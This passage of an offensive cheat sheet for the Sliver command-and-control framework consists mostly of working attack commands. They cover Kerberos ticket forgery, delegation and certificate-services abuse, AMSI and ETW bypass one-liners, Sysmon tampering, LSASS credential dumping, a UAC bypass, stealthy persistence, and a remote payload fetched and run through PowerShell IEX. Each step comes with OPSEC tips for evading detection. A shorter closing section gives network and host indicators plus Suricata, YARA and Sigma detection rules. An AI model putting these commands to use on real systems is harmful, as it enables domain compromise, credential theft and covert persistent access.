# Target specific user
sliver (SESSION) > execute-assembly Rubeus.exe asreproast /user:testuser /format:hashcat
# Download hashes
sliver (SESSION) > download C:\Windows\Temp\asrep.txt /tmp/
# Crack with Hashcat
$ hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
OPSEC: AS-REP Roasting generates Event ID 4768 (TGT request) with no pre-auth. Less common than Kerberoasting. Requires accounts with pre-auth disabled.
Golden Ticket#
Create Domain-Wide Persistence:
# Obtain krbtgt hash (requires DA)
sliver (SESSION) > mimikatz lsadump::dcsync /domain:corp.local /user:krbtgt
# Create golden ticket
sliver (SESSION) > mimikatz kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /id:500 /ptt
# Verify access
sliver (SESSION) > execute klist
sliver (SESSION) > execute dir \\dc01\C$
# Alternative: Rubeus
sliver (SESSION) > execute-assembly Rubeus.exe golden /rc4:<krbtgt_hash> /user:Administrator /domain:corp.local /sid:S-1-5-21-... /ptt
OPSEC: Golden tickets bypass authentication. Valid for 10 years (default). No network communication. Detected via TGT anomalies (group memberships, encryption types). Use realistic parameters.
Silver Ticket#
Service-Specific Tickets:
# Obtain service account hash
sliver (SESSION) > mimikatz sekurlsa::logonpasswords
# Create silver ticket for CIFS
sliver (SESSION) > mimikatz kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:dc01.corp.local /service:cifs /rc4:<service_hash> /ptt
# Access service
sliver (SESSION) > execute dir \\dc01\C$
# Services:
# - cifs (file share)
# - http (web services)
# - host (remote tasks)
# - rpcss (WMI)
# - mssql (SQL Server)
OPSEC: Silver tickets target specific services. No DC communication. Harder to detect than golden tickets. Service hash easier to obtain than krbtgt. Ticket lifetime matches service SPN.
Constrained Delegation#
Abuse Delegation Rights:
# Enumerate constrained delegation
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainComputer -TrustedToAuth
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainUser -TrustedToAuth
# Request TGT with AES key
sliver (SESSION) > execute-assembly Rubeus.exe asktgt /user:sqlservice /aes256:<aes_key>
# Request TGS for target service
sliver (SESSION) > execute-assembly Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /user:sqlservice /aes256:<aes_key> /ptt
# Access target
sliver (SESSION) > execute dir \\dc01\C$
OPSEC: Constrained delegation is a feature, not vulnerability. Generates legitimate Kerberos traffic. Monitor Event ID 4769 for S4U2Proxy. Requires delegation configured on account.
Unconstrained Delegation#
Capture TGTs:
# Find unconstrained delegation hosts
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainComputer -Unconstrained
# Compromise unconstrained host
# Extract cached TGTs
sliver (SESSION) > mimikatz sekurlsa::tickets /export
# Wait for DA to connect or force authentication
sliver (SESSION) > execute-assembly SpoolSample.exe dc01.corp.local unconstrained-host.corp.local
# Monitor for tickets
sliver (SESSION) > mimikatz sekurlsa::tickets /export
# Use captured TGT
sliver (SESSION) > mimikatz kerberos::ptt Administrator@krbtgt-CORP.LOCAL.kirbi
OPSEC: Unconstrained delegation is legacy and dangerous. Rarely enabled on modern networks. Forces TGT storage in LSASS. High-value targets. DCs have unconstrained delegation by default.
ADCS Exploitation#
Certificate Services Attacks:
# Enumerate ADCS
sliver (SESSION) > execute-assembly /path/to/Certify.exe find /vulnerable
# ESC1 - Certificate template abuse
sliver (SESSION) > execute-assembly Certify.exe request /ca:dc01.corp.local\corp-CA /template:VulnTemplate /altname:Administrator
# Convert certificate
sliver (SESSION) > download cert.pem /tmp/
$ certipy cert -pfx /tmp/cert.pem -out /tmp/admin.pfx
# Request TGT using certificate
$ certipy auth -pfx /tmp/admin.pfx -dc-ip 10.10.20.10
# ESC8 - Web enrollment relay
sliver (SESSION) > execute-assembly Certify.exe find /enrollmentendpoint
# Use ntlmrelayx to relay to web enrollment
OPSEC: ADCS attacks are stealthy. Certificate requests are legitimate. Monitor Event IDs 4886, 4887. Certificate authentication bypasses password policies. Golden certificates persist indefinitely.
GPO Abuse#
Modify Group Policy:
# Enumerate GPOs
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainGPO
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainGPOLocalGroup
# Find GPO with write access
sliver (SESSION) > execute-assembly SharpView.exe Get-DomainObjectAcl -Identity "Corp Default Policy" | Where-Object {$_.ActiveDirectoryRights -match "WriteProperty"}
# Upload SharpGPOAbuse
sliver (SESSION) > upload /path/to/SharpGPOAbuse.exe C:\Windows\Temp\
# Add local admin
sliver (SESSION) > execute-assembly SharpGPOAbuse.exe --AddLocalAdmin --UserAccount jdoe --GPOName "Corp Default Policy"
# Scheduled task via GPO
sliver (SESSION) > execute-assembly SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author "Microsoft" --Command "C:\Windows\Temp\implant.exe" --GPOName "Corp Default Policy"
# Force GPO update
sliver (SESSION) > execute gpupdate /force
OPSEC: GPO modifications generate Event IDs 4662, 5136. High-value attack. Changes apply domain-wide. Requires write access to GPO. Difficult to detect without SIEM correlation.
Evasion & OPSEC#
Process Injection#
Built-in Process Injection:
# Inject into process
sliver (SESSION) > migrate <pid>
# Spawn new process and inject
sliver (SESSION) > execute-shellcode --pid <pid> /path/to/shellcode.bin
# Inject into specific process
sliver (SESSION) > ps | grep explorer
sliver (SESSION) > migrate <explorer_pid>
OPSEC: Process injection triggers EDR behavioral detection. Inject into long-running, trusted processes (explorer.exe, svchost.exe). Avoid critical processes (csrss.exe, lsass.exe).
AMSI Bypass#
Disable AMSI:
# Patch AMSI in memory
sliver (SESSION) > execute-assembly /path/to/AMSIBypass.exe
# PowerShell AMSI bypass
sliver (SESSION) > powershell -Command "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
# Force AMSI error
sliver (SESSION) > powershell -Command "$a='AmsiUtils'; $b='amsiInitFailed'; [Delegate]::CreateDelegate((New-Object 'System.Management.Automation.'+$a+', System.Management.Automation').GetMethod('AmsiInitialize'), $null).Invoke()"
OPSEC: AMSI bypasses frequently updated by Microsoft. Test before deployment. ETW may still log suspicious PowerShell. Consider obfuscation instead of AMSI bypass.
ETW Patching#
Disable Event Tracing:
# Patch ETW
sliver (SESSION) > execute-assembly /path/to/ETWBypass.exe
# Alternative PowerShell method
sliver (SESSION) > powershell -Command "$etwProvider = [Ref].Assembly.GetType('System.Diagnostics.Eventing.EventProvider'); $etwEnabled = $etwProvider.GetField('m_enabled','NonPublic,Instance'); $etwEnabled.SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),$false)"
OPSEC: ETW patching prevents PowerShell ScriptBlock logging (Event ID 4104). May trigger EDR. Consider per-process patching. Kernel-level ETW monitoring cannot be bypassed from user-mode.
Obfuscation#
String Obfuscation:
# Generate with obfuscation
sliver > generate --http 192.168.1.100:443 --os windows --obfuscate --skip-symbols --save /tmp/
# Obfuscate implant post-generation
$ python3 -m sliver-obfuscate /tmp/implant.exe -o /tmp/obfuscated.exe
PowerShell Obfuscation:
# Invoke-Obfuscation
sliver (SESSION) > powershell -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/obfuscated.ps1')"
# Base64 encoding
sliver (SESSION) > powershell -EncodedCommand <base64_command>
OPSEC: Obfuscation evades signature-based detection. Behavioral detection still effective. Use multiple layers. Avoid known obfuscation patterns.
Sandbox Detection#
Evasion Checks:
# Check for VM/Sandbox indicators
sliver (SESSION) > execute systeminfo | findstr /C:"VMware" /C:"VirtualBox" /C:"Hyper-V"
sliver (SESSION) > execute reg query "HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum" | findstr VM
# Check for analysis tools
sliver (SESSION) > execute tasklist | findstr /I "wireshark procmon processhacker"
# Sleep/time checks (built into implant generation)
sliver > generate --evasion --http 192.168.1.100:443 --os windows
OPSEC: Sandbox evasion built into Sliver implants. Add custom checks for target-specific environments. Delay execution. Check domain-join status.
Sysmon Evasion#
Avoid Detection:
# Check if Sysmon installed
sliver (SESSION) > execute sc query sysmon
sliver (SESSION) > execute sc query sysmon64
# Unload Sysmon (requires SYSTEM)
sliver (SESSION) > execute fltmc unload SysmonDrv
# Disable Sysmon service
sliver (SESSION) > execute sc stop sysmon64
sliver (SESSION) > execute sc config sysmon64 start= disabled
OPSEC: Sysmon tampering generates Event ID 1 (service stopped), 4, 255. Highly suspicious. Alternative: avoid logged actions (use direct syscalls, kernel callbacks). Do not disable Sysmon unless necessary.
Extensions & BOFs#
Armory - Extension Repository#
Browse & Install Extensions:
# List available extensions
sliver > armory
# Search for extension
sliver > armory search mimikatz
# Install extension
sliver > armory install mimikatz
sliver > armory install sharpview
sliver > armory install rubeus
# Update armory cache
sliver > armory update
# View installed extensions
sliver > armory list
Using Installed Extensions:
# Load and use extension
sliver (SESSION) > mimikatz sekurlsa::logonpasswords
sliver (SESSION) > rubeus kerberoast /outfile:tickets.txt
OPSEC: Armory simplifies tool management. Verify extension sources. Some extensions are signatures. Test before operational use.
Beacon Object Files (BOFs)#
Execute BOFs:
# List available BOFs
sliver > bofs
# Execute BOF
sliver (SESSION) > bof /path/to/custom.o argument1 argument2
# Common BOFs:
# - Process enumeration
# - Registry operations
# - File operations
# - Network scanning
Custom BOF Development:
// Example BOF (custom.c)
#include <windows.h>
#include "beacon.h"
void go(char* args, int len) {
BeaconPrintf(CALLBACK_OUTPUT, "Executing custom BOF\n");
// Custom functionality
}
Compile BOF:
# Compile with MinGW
x86_64-w64-mingw32-gcc -c custom.c -o custom.o
# Load and execute
sliver (SESSION) > bof /tmp/custom.o
OPSEC: BOFs run in-process (no process injection). Faster execution. Minimal artifacts. Avoid spawning child processes. Use for stealthy operations.
Execute-Assembly#
Run .NET Assemblies:
# Execute .NET assembly in-memory
sliver (SESSION) > execute-assembly /path/to/Rubeus.exe kerberoast
sliver (SESSION) > execute-assembly /path/to/SharpHound.exe -c All
sliver (SESSION) > execute-assembly /path/to/SharpView.exe Get-DomainUser
# Execute with arguments
sliver (SESSION) > execute-assembly /path/to/Seatbelt.exe -group=all
OPSEC: Execute-assembly loads CLR in-memory. May trigger AMSI. Generates .NET ETW events. Use with AMSI/ETW bypass. In-memory execution avoids disk artifacts.
SpawnDLL#
Reflective DLL Injection:
# Inject DLL into new process
sliver (SESSION) > spawndll /path/to/evil.dll
# Inject into specific process
sliver (SESSION) > spawndll /path/to/evil.dll <pid>
# Export function
sliver (SESSION) > spawndll /path/to/evil.dll <pid> CustomFunction
OPSEC: Reflective DLL injection bypasses LoadLibrary. No disk artifacts. Triggers EDR process injection detection. Use trusted processes as targets.
Sideload#
DLL Sideloading:
# Generate sideload implant
sliver > generate --format shared --os windows
# Deploy with vulnerable application
sliver (SESSION) > upload /tmp/implant.dll C:\VulnerableApp\version.dll
sliver (SESSION) > execute C:\VulnerableApp\app.exe
OPSEC: DLL sideloading appears legitimate. Application-specific. Requires identifying vulnerable apps. Persistence through application restarts.
Advanced Techniques#
Token Operations#
Token Theft & Manipulation:
# List available tokens
sliver (SESSION) > ps -T
# Steal token from process
sliver (SESSION) > steal-token <pid>
# Make token (create new token with creds)
sliver (SESSION) > make-token CORP\admin Password123
# Revert to original token
sliver (SESSION) > revert-to-self
# Check current token
sliver (SESSION) > whoami /all
OPSEC: Token operations require SeDebugPrivilege or SeImpersonatePrivilege. Generates Event ID 4673. Use tokens from legitimate processes. Revert when done.
Named Pipes#
SMB Named Pipe C2:
# Start named pipe listener
sliver > named-pipe --name \\.\pipe\msagent
# Generate pivot implant
sliver > generate --named-pipe msagent --os windows
# Deploy on target
# Automatically connects through named pipe
OPSEC: Named pipes for internal pivoting. Appears as local IPC. Less network traffic. Useful for air-gapped environments. Monitor pipe creation (Event ID 18).
TCP/UDP Pivots#
Network Pivots:
# TCP pivot listener
sliver > stage-listener --tcp 192.168.10.5:4444
# Generate TCP pivot implant
sliver > generate --tcp 192.168.10.5:4444 --os windows
# UDP pivot (less common)
sliver > stage-listener --udp 192.168.10.5:5555
sliver > generate --udp 192.168.10.5:5555 --os windows
OPSEC: TCP/UDP pivots for segmented networks. Direct connection to internal hosts. Useful when HTTP/HTTPS unavailable. Monitor for anomalous connections.
Shellcode Injection#
Remote Process Injection:
# Generate shellcode
sliver > generate --format shellcode --http 192.168.1.100:443
# Inject into remote process
sliver (SESSION) > execute-shellcode --pid <target_pid> /path/to/shellcode.bin
# Self-injection
sliver (SESSION) > execute-shellcode /path/to/shellcode.bin
OPSEC: Shellcode injection triggers behavioral detection. Use legitimate processes. Avoid protected processes. Consider thread hijacking or APC injection.
Chaining C2 Channels#
Multi-Protocol Redundancy:
# Generate with multiple protocols
sliver > generate --mtls 192.168.1.100:8888 --http 192.168.1.100:443 --dns target.com --os windows
# Implant attempts connections in order:
# 1. mTLS (fastest, most reliable)
# 2. HTTP/HTTPS (proxy-aware)
# 3. DNS (slowest, most covert)
OPSEC: Multiple C2 channels increase resilience. Fallback if primary blocked. Redundancy for long-term ops. Test all channels before deployment.
Common Attack Scenarios#
Scenario 1: Initial Access → Domain Admin#
Phase 1: Initial Foothold
# Generate phishing payload
sliver > generate --http 192.168.1.100:443 --os windows --format exe --obfuscate --skip-symbols --save /tmp/
# Host payload
sliver > websites add-content --website corp --web-path /updates/security.exe --content /tmp/IMPLANT.exe
# Target executes payload
# Session established
sliver > sessions
sliver > use <session_id>
Phase 2: Local Reconnaissance
sliver (SESSION) > info
sliver (SESSION) > ps
sliver (SESSION) > whoami /all
sliver (SESSION) > execute systeminfo
sliver (SESSION) > execute net user /domain
sliver (SESSION) > execute net group "Domain Admins" /domain
Phase 3: Credential Access
# Check privileges
sliver (SESSION) > whoami /priv
# If local admin, dump credentials
sliver (SESSION) > procdump -n lsass.exe -s lsass.dmp
sliver (SESSION) > download lsass.dmp /tmp/
# Parse offline
$ pypykatz lsa minidump lsass.dmp
Phase 4: Lateral Movement
# Setup SOCKS proxy
sliver (SESSION) > socks5 start
# Scan domain
$ proxychains crackmapexec smb 10.10.20.0/24 -u jdoe -p 'Password123'
# Find admin access
$ proxychains crackmapexec smb 10.10.20.0/24 -u jdoe -p 'Password123' --local-auth
# Move laterally
sliver (SESSION) > upload /tmp/implant.exe \\10.10.20.50\C$\Windows\Temp\svchost.exe
sliver (SESSION) > execute sc \\10.10.20.50 create UpdateSvc binPath= "C:\Windows\Temp\svchost.exe" start= auto
sliver (SESSION) > execute sc \\10.10.20.50 start UpdateSvc
# New session from lateral host
sliver > sessions
Phase 5: Domain Dominance
# Kerberoast from new session
sliver (SESSION2) > execute-assembly Rubeus.exe kerberoast /outfile:tickets.txt
sliver (SESSION2) > download tickets.txt /tmp/
# Crack service account
$ hashcat -m 13100 tickets.txt rockyou.txt --force
# Authenticate as service account
sliver (SESSION2) > make-token CORP\sqlsvc CrackedPassword123
# Check privileges
sliver (SESSION2) > execute-assembly SharpView.exe Get-DomainUser -Identity sqlsvc
# If constrained delegation, escalate
sliver (SESSION2) > execute-assembly Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/dc01.corp.local /user:sqlsvc /rc4:<hash> /ptt
# Access DC
sliver (SESSION2) > execute dir \\dc01\C$
# DCSync
sliver (SESSION2) > mimikatz lsadump::dcsync /domain:corp.local /all
Scenario 2: Low & Slow Persistence#
Long-Term Beacon Deployment
# Generate beacon with long callback
sliver > generate beacon --http cdn.example.com:443 --seconds 300 --jitter 50 --os windows --obfuscate --save /tmp/
# Deploy via scheduled task
sliver (SESSION) > upload /tmp/BEACON.exe C:\Windows\System32\WindowsUpdate.exe
sliver (SESSION) > execute schtasks /create /tn "Microsoft\Windows\WindowsUpdate\ScheduledStart" /tr "C:\Windows\System32\WindowsUpdate.exe" /sc daily /st 09:00 /ru SYSTEM /f
# Beacon checks in every 5 minutes (±50%)
sliver > beacons
# Queue tasks during check-in
sliver > use <beacon_id>
sliver (BEACON) > ls C:\Users\Administrator\Documents
sliver (BEACON) > tasks
# Wait for next check-in
sliver (BEACON) > tasks fetch
WMI Event Persistence
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="SystemUpdate", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="SystemConsumer", CommandLineTemplate="C:\Windows\System32\WindowsUpdate.exe"
sliver (SESSION) > execute wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name='SystemUpdate'", Consumer="CommandLineEventConsumer.Name='SystemConsumer'"
Scenario 3: Pivoting Through Network Segments#
Establish Pivot Chain
# Session on DMZ host
sliver > use <dmz_session>
# Setup SOCKS proxy
sliver (DMZ) > socks5 start
# Scan internal network
$ proxychains nmap -sT -Pn 10.10.30.0/24
# Find accessible host
$ proxychains crackmapexec smb 10.10.30.50 -u admin -p Password123
# Generate pivot implant (mTLS for speed)
sliver > generate --mtls 10.10.20.100:8888 --os windows --save /tmp/
# Transfer through SOCKS
$ proxychains impacket-smbclient CORP/admin:Password123@10.10.30.50
# Upload implant
# Execute via WMI/PsExec
# New session from internal network
sliver > sessions
# Setup second SOCKS proxy
sliver > use <internal_session>
sliver (INTERNAL) > socks5 start -p 1082
# Chain proxies in proxychains.conf
[ProxyList]
socks5 127.0.0.1 1081 # DMZ proxy
socks5 127.0.0.1 1082 # Internal proxy
# Access deeper network
$ proxychains crackmapexec smb 10.10.40.0/24
Troubleshooting#
Implant Not Calling Back#
Checklist:
# Verify listener is running
sliver > jobs
# Check firewall on team server
$ sudo iptables -L -n | grep <port>
$ sudo ufw status
# Test connectivity from target network
# From target:
C:\> curl -v https://192.168.1.100:443
C:\> nslookup target.com
# Check C2 profile configuration
sliver > c2profile
# Verify proxy settings (if using HTTP)
C:\> netsh winhttp show proxy
# Check DNS resolution (if using DNS C2)
C:\> nslookup _sliver.target.com
# Review team server logs
$ tail -f /root/.sliver/logs/sliver.log
Session Died/Lost#
Recovery:
# Check if beacon mode (auto-reconnect)
sliver > beacons
# Review persistence mechanisms
# Trigger persistence (reboot, scheduled task, etc.)
# Check for EDR termination
# Review target's event logs for process termination
# Deploy backup implant via different protocol
sliver > generate --dns target.com --os windows
Unable to Dump LSASS#
Alternatives:
# Check for PPL (Protected Process Light)
sliver (SESSION) > execute tasklist /svc | findstr lsass
# Method 1: Use comsvcs.dll
sliver (SESSION) > execute rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass_pid> C:\Windows\Temp\dump.bin full
# Method 2: Silent Process Exit
sliver (SESSION) > execute reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe" /v ReportingMode /t REG_DWORD /d 2 /f
sliver (SESSION) > execute reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe" /v DumpType /t REG_DWORD /d 2 /f
sliver (SESSION) > execute reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe" /v LocalDumpFolder /t REG_SZ /d "C:\Windows\Temp" /f
# Method 3: Use EDR's own tools (if available)
sliver (SESSION) > execute "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File C:\Windows\System32\lsass.exe -DisableRemediation
# Method 4: Dump remotely via Task Manager
sliver (SESSION) > execute taskmgr.exe
# Right-click lsass.exe → Create dump file
Privileges Insufficient#
Escalation Options:
# Check current privileges
sliver (SESSION) > whoami /priv
sliver (SESSION) > whoami /groups
# UAC bypass (if medium integrity)
sliver (SESSION) > execute reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /t REG_SZ /d "C:\Windows\Temp\implant.exe" /f
sliver (SESSION) > execute reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f
sliver (SESSION) > execute fodhelper.exe
# Token theft (if SeImpersonatePrivilege)
sliver (SESSION) > ps -T | grep SYSTEM
sliver (SESSION) > steal-token <system_pid>
# Service account escalation
sliver (SESSION) > upload /tmp/JuicyPotato.exe C:\Windows\Temp\
sliver (SESSION) > execute C:\Windows\Temp\JuicyPotato.exe -l 1337 -p C:\Windows\Temp\implant.exe -t * -c {CLSID}
# Find kernel exploits
sliver (SESSION) > execute systeminfo
# Research CVEs for OS version
Detection Rules & Indicators#
Network Indicators#
HTTP/HTTPS C2:
- TLS certificates with short validity periods
- Self-signed certificates
- Uncommon JA3/JA3S fingerprints
- Beaconing pattern (regular intervals with jitter)
- High entropy in HTTP bodies
- Unusual User-Agent strings
- Connections to uncommon ports (not 80/443)
DNS C2:
- High volume of DNS TXT record queries
- Long DNS query strings (base64-encoded data)
- Queries to newly registered domains
- DGA-like domain patterns
- DNS queries with high entropy subdomains
Detection Example (Suricata):
alert tls any any -> any any (msg:"Possible Sliver C2"; tls.cert_subject; content:"CN="; pcre:"/CN=[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}/"; sid:1000001;)
Host Indicators#
Process Indicators:
- Unsigned binaries in %TEMP% or %APPDATA%
- Processes with random names (UUID patterns)
- Processes with network connections to uncommon IPs
- Parent-child process anomalies (e.g., Excel spawning PowerShell)
- In-memory .NET CLR loaded without corresponding binary
File System Indicators:
- Files in C:\Windows\Temp\ with recent creation timestamps
- Executables in user directories
- DLL files in uncommon locations
- Files with high entropy (packed/encrypted)
Registry Indicators:
- New Run keys with random value names
- COM object hijacking (modified InprocServer32 keys)
- Silent Process Exit keys for LSASS
- WMI event subscriptions in root\subscription
Yara Rules#
Sliver Implant Detection:
rule Sliver_Implant {
meta:
description = "Detects Sliver C2 implant"
author = "Red Team"
date = "2024-01-01"
strings:
$s1 = "sliver" ascii nocase
$s2 = "beacon" ascii
$s3 = "rpc.Invoke" ascii
$s4 = "github.com/bishopfox/sliver" ascii
$hex1 = { 53 6C 69 76 65 72 } // "Sliver"
condition:
uint16(0) == 0x5A4D and any of ($s*) or $hex1
}
Sigma Rules#
Sliver Session Detection:
title: Sliver C2 Beacon Execution
status: experimental
description: Detects execution of Sliver implant
references:
- https://github.com/BishopFox/sliver
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '--mtls'
- '--http'
- '--dns'
Image|endswith:
- '\AppData\Local\Temp\'
- '\Public\'
condition: selection
falsepositives:
- Unknown
level: high
Quick Reference Commands#
Essential Commands#
# Generate HTTPS implant with evasion
sliver > generate --http <ip>:443 --os windows --obfuscate --skip-symbols --evasion --save /tmp/
# Generate beacon (low & slow)
sliver > generate beacon --http <ip>:443 --seconds 60 --jitter 30 --os windows --save /tmp/
# List sessions/beacons
sliver > sessions
sliver > beacons
# Interact with session
sliver > use <session_id>
sliver (SESSION) > info
# Background session
sliver (SESSION) > background
# Setup SOCKS proxy
sliver (SESSION) > socks5 start
# Process injection
sliver (SESSION) > migrate <pid>
# Credentials
sliver (SESSION) > procdump -n lsass.exe -s lsass.dmp
sliver (SESSION) > mimikatz sekurlsa::logonpasswords
# Execute assembly
sliver (SESSION) > execute-assembly /path/to/tool.exe arguments
# File operations
sliver (SESSION) > ls
sliver (SESSION) > cd <path>
sliver (SESSION) > download <remote> <local>
sliver (SESSION) > upload <local> <remote>
# Shell access
sliver (SESSION) > shell
sliver (SESSION) > powershell
# Cleanup
sliver (SESSION) > rm <file>
sliver > sessions -k <session_id>
Keyboard Shortcuts#
Ctrl+C - Cancel current command
Ctrl+D - Exit session/exit Sliver
Ctrl+L - Clear screen
Tab - Auto-complete
↑/↓ - Command history